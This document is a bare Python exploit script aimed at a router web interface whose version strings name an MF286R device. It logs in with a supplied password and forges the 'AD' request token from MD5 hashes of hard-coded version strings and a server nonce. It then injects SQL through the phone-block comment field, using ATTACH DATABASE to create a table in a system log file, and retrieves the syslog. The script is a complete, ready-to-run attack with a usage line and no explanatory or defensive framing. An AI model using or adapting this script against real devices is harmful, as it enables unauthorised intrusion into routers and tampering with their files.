import time import requests import hashlib import sys import base64 wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12" cr_version = "CR_ITPOSTEMF286RV1.0.0B10" FORM = lambda x: {"isTest": False, "goformId": x} s = requests.Session() def login(): data = FORM("LOGIN") data["password"] = PASSWD status = s.post( f"{HOST}/goform/goform_set_cmd_process", headers=HDRS, data=data, ).json() login_status = "[+] Login: " login_status += "success" if status["result"] == "0" else "fail" print(login_status) def get_AD(): def md5(s): m = hashlib.md5() m.update(s.encode("utf-8")) return m.hexdigest() a = md5(wa_inner_version + cr_version) rd = requests.get( f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={int(time.time())}", headers=HDRS, ) return md5(a + rd.json()["RD"]) def get_response(server_resp): status = "[+] payload injected: " if "success" in server_resp.text: status += "success" else: status += "fail" print(status) def sqli(): target = "/var/log/webshow_messages" hostname_form = FORM("PHONE_BLOCK_ADD") hostname_form["block_number"] = "testestesttest" hostname_form[ "block_comment" ] = f"test'); ATTACH DATABASE '{target}' AS t; CREATE TABLE t.pwn (dataz text);INSERT INTO t.pwn (dataz) VALUES ('testestesttest');--" hostname_form["AD"] = get_AD() a = s.post( f"{HOST}/goform/goform_set_cmd_process", headers=HDRS, data=hostname_form, ) get_response(a) def get_log(): logs = s.get(f"{HOST}/cgi-bin/ExportSyslog.sh", headers=HDRS) if len(logs.text) > 0: print(logs.text) print("[+] Logs written into last-log.txt") with open("last-log.txt", "w") as logf: logf.write(logs.text) if __name__ == "__main__": if len(sys.argv) < 3: print("usage: python3 run.py http:// ") sys.exit(0) HOST = sys.argv[1] HDRS = { "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Origin": HOST, "Referer": f"{HOST}/index.html", } PASSWD = base64.b64encode(sys.argv[2].encode()).decode() login() sqli() get_log()